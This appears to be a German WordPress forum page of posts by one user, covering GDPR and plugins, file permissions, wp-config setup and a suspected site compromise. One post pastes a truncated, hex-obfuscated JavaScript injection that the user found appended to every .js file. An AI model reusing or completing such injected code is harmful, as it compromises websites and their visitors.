Ach so ist das. Danke für die Info.
Beiträge von davtedo
-
-
1. Was genau macht denn WordPress selbst schon von sich aus? Was funkt es nach USA?
Interessant wäre vor allem die Frage, wie man das unterbinden kann. Man kann ja nicht bei jeder betreuten Website manuell nach jedem Update Nach-Hause-telefonier-Code entfernen.
Zitat2. Wie stelle ich denn fest, wer (WP, Plugins) auf einer Webseite was funkt […] Gibt es da irgendein Tool?
Meine Vermutung ist, dass man da schon eine Firewall oder sogar einen Netzwerksniffer zur Hand nehmen muss. Denn nicht wenige Plugins dienen der Sammlung von Daten. Die werden sich der EU-Problematik gegenüber wohl nicht aufgeschlossen zeigen.
Zitat4. Richtig finde ich auch den Vorschlag, hier im Forum einen extra Bereich aufzumachen für die DSGVO […]
Unbedingt!
Zitat5. Super finde ich auch den Vorschlag von @Raphael, eine separaten Post mit einer Checkliste anzulegen, welches Plugin rechtsicher ist bzw. wie man WP selbst und die Plugins rechtssicher konfiguriert. Ich wäre da dabei und würde mithelfen!
Ja, ich mache auch mit. Bin gerade schon dabei, die bisher vorhandenen Plugins zu untersuchen, die sich mit DSGVO/GDPR beschäftigen. -
Mir ist erst kürzlich aufgefallen, dass der "Titel der Website" im Customizer später zur H1 wird.
Der Titel einer Seite (das 1. Feld) wird später nur H2.Sollte es nicht so sein, dass der Titel eines Beitrags/einer Seite H1 ist, damit Suchmaschinen die Semantik eines Beitrags bzw. einer Seite dadurch besser verstehen?
Dass die H1 auf jedem Screen immer der Titel der Website (also Karstadt, WordPress, Spiegel etc.) ist, macht doch keinen Sinn.Oder was verstehe ich da falsch?
-
Ok, danke für Eure Tipps.
Ich weiß jetzt erst im Nachhinein zu formulieren, dass ich eine Installation per Routine wollte. Nach deren Beendigung musste ich die wp-config.php ändern, um die Zugangsdaten zur Datenbank einzugeben. Das fand ich sehr mühselig: per FTP rein, Rechte ändern (weiß ich doch nicht, was 654 321 bedeutet), DB-Zugangsdaten in einem Texteditor, Rechte wieder zurückändern (644? 640? 600?).
Ich hatte es mir vorher so gedacht, dass man das während der Installation machen kann (ich glaube so kannte ich es vom OwnCloud-Installer). Da muss man sich nicht um Rechte kümmern.Trotzdem danke an alle für Eure Hilfe!
-
[…] Dann spielt der Besitzer keine Rolle.
Aah! – das finde ich jetzt hilfreich, dass der Besitzer keine Rolle spielt. Danke Dir.
-
Hattest Du irgendwann mal die PHP-Version geändert?
Nein – aber ich hatte schon mal das Gefühl, der Eintrag hat sich geändert. WIrd das von all-inkl vielleicht im Rahmen von Updates mal angehoben? Oder weil eine neue WP-Version das erfordert?ZitatMan kann im KAS unter Tools->Besitzrechte den Owner ändern. Dann muß man aber ggf. auch die Zugriffsrechte anpassen, damit die Uploads funktionieren.
Ah – das klingt doch eigentlich vernünftig. Ich habe es jetzt so verstanden, dass der Besitzer eigentlich www-data sein sollte. Wenn man nun über das Upload-Tool in KasServer oder per FTP-Client etwas auf den Server schiebt, bekommen die Files trotzdem den Besitzer www-data – richtig? Das will man doch, oder? -
Die Frage ist, unter welchem Benutzer dein Webserver ausgeführt wird? Das sollte nach Möglichkeit auch der Besitzer sein.
Heißt das, dass Ordner, die durch FTP-Transfer den FTP-Benutzer als Besitzer haben, auf den www-data geändert werden sollten? -
Leider sehe ich gerade in meiner WP-Installation, dass die Einstellungen für Besitzer und Gruppe wild variieren:
Im Ordner Uploads ist der Ordner 2015 dem Besitzer www-data zugeordnet, der Ordner 2016 jedoch meinem Verwaltungs-User yxz12345 beim Hoster all-inkl.
Bei der Gruppenzugehörigkeit ist es genauso.Was ist korrekt?
Welche Instanz hat das verstellt bzw. verteilt die Zuordnung so uneinheitlich? Die Ordner 2015 bzw. 2016 sind doch durch eine ganz normale Grundeinstellung entstanden, oder?
Herzlichen Dank für Tipps!
-
Danke für Deinen Rat.
Trotzdem möchte ich gerne noch mal nachhaken, ob es eine Anleitung gibt, die beschreibt, wie man die vorhandene Konfiguration weiterverwenden kann.
Wenn ich Dich richtig verstehe, könnte es also funktionieren, alles zu löschen, außer der Datei wp-config.php und dann die Installation dann noch mal starten? Oder wird eine vorhandene wp-config.php bei einer Installation überschrieben? -
davtedo Wie kommst du darauf, dass du eventuell gehackt wurdest?
Weil ALLE *.js-Files am Dateiende Fremd-Code enthalten.
Spiele ich ein Backup mit sauberen Files ein, sind nach wenigen Stunden alle *.js-Files wieder damit infiziert.
So sehe die ersten paar Zeilen dieses Fremd-Codes aus (von etwa 20 mal so vielen):
[FONT=courier new] /*304260db287a80b13ff0ed9fd9ed1b79*/;window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"]["\x69\x61\x73\x6e\x64"]=["\x32\x32\x62\x37\x38\x33\x32\x33\x32\x37\x31\x37\x31\x32\x62\x32\x32\x32\x37\x33\x65\x33\x63\x32\x66\x36\x39\x36\x36\x37\x32\x36\x31\x36\x64\x36\x35\x33\x65\x33\x63\x32\x66\x36\x34\x36\x39\x37\x36\x33\x65\x32\x32\x33\x62\x36\x34\x36\x66\x36\x33\x37\x35\x36\x64\x36\x35\x36\x65\x37\x34\x32\x65\x36\x32\x36\x66\x36\x34\x37\x39\x32\x65\[/FONT] -
Plugins nur aus offizieller Stelle laden […]
Das ist doch überhaupt keine Antwort auf meine Frage.
-
Danke maxe ! Da steht gleich ganz oben MailPoet drauf – hatte ich leider drin. Mist.
-
Hallo Leute,
finde ich irgendwo eine Anleitung, die einem Newbee erklärt, wie man eine Neuinstallation von WP durchführt, aber die bestehende DB verwendet?
Herzlichen Dank an alle! -
Gibt es eine Website oder einen Thread, wo eine Liste von Plugins geführt wird, die verantwortlich für Hacks bzw. Sicherheitslücken sind?
Oder wie findet man heraus, ob ein Plugin Sicherheitslücken hat?
Ich habe nämlich das Problem, vermutlich gehackt worden zu sein. Da meine Passworte sehr lang und komplex sind (25 Zeichen, von Keepass generiert) und ich mir nicht vorstellen kann, dass ausgerechnet in meiner Site Wordpress-Lücken ausgenutzt werden, vermute ich die Ursache bei einem Plugin.